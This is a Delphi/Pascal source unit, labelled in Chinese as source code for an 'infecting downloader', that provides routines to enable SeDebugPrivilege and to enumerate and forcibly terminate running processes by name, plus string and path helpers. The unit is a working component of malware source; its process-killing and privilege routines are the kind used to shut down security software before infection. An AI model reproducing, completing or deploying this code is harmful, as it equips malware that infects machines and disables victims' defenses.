kttv.pas

感染下载者源码 感染下载者源码 感染下载者源码

unit kttv;

interface

uses
  Windows,Tlhelp32;

function kt(ExeFileName: string): Integer;     //关闭进程
function edp: Boolean;              //提升权限
function getwinsys(n:integer):string;

implementation


function getwinsys(n:integer):string;
var
 SysDir:array[0..255]of char;
begin
if n=1 then
GetWindowsDirectory(SysDir,255)
else
GetSystemDirectory(SysDir,255);
result:=SysDir;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;

function UpperCase(AStr:string):string; overload;
var
 LI:Integer;
begin
 Result:=AStr;
 for LI:=1 to Length(Result) do
  Result[LI]:=System.UpCase(Result[LI]);
end;
function LowerCase(const S: string): string;
var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;
function ExtractFilePath(APath:string):string;
var
 LI,LJ:Integer;
begin
 if (Length(APath)<>0) and (Pos('\',APath)>0) then
 begin
  LJ:=0;
  for LI:=Length(APath) downto 1 do
   if APath[LI]='\' then
   begin
    LJ:=LI;
    Break;
   end;
  Result:=Copy(APath,1,LJ);
 end else Result:='';
end;
function ExtractFileName(APath:string):string;
var
 LI,LJ:Integer;
begin
 if Length(APath)<>0 then
 begin
  LJ:=0;
  for LI:=Length(APath) downto 1 do
   if APath[LI]='\' then
   begin
    LJ:=LI;
    Break;
   end;
  Result:=Copy(APath,LJ+1,MaxInt);
 end else Result:='';
end;
function edp: Boolean;
  function EnablePrivilege(hToken: Cardinal; PrivName: string; bEnable: Boolean): Boolean;
  var
  TP: TOKEN_PRIVILEGES;
  Dummy: Cardinal;
  begin
  TP.PrivilegeCount := 1;
  LookupPrivilegeValue(nil, pchar(PrivName), TP.Privileges[0].Luid);
  if bEnable then
  TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
  else TP.Privileges[0].Attributes := 0;
  AdjustTokenPrivileges(hToken, False, TP, SizeOf(TP), nil, Dummy);
  Result := GetLastError = ERROR_SUCCESS;
  end;
var
  hToken: Cardinal;
begin
  OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken);
  result:=EnablePrivilege(hToken, 'SeDebugPrivilege', True);
  CloseHandle(hToken);
end;

function kt(ExeFileName: string): Integer;
const
  PROCESS_TERMINATE = $0001;
var
  ContinueLoop: boolean;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
  hh: hwnd;
  tem:string;
begin
  Result := 0;
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
  while Integer(ContinueLoop) <> 0 do
  begin
  tem:=lowerCase(FProcessEntry32.szExeFile);
  if (pos(ExtractFileName(tem),ExeFileName)>0) or (pos(tem,ExeFileName)>0) then
  begin
      hh := OpenProcess(PROCESS_ALL_ACCESS, true, FProcessEntry32.th32ProcessID);
      if TerminateProcess(hh, 0) then
      Result := 1;
  end;
  ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
end;



end.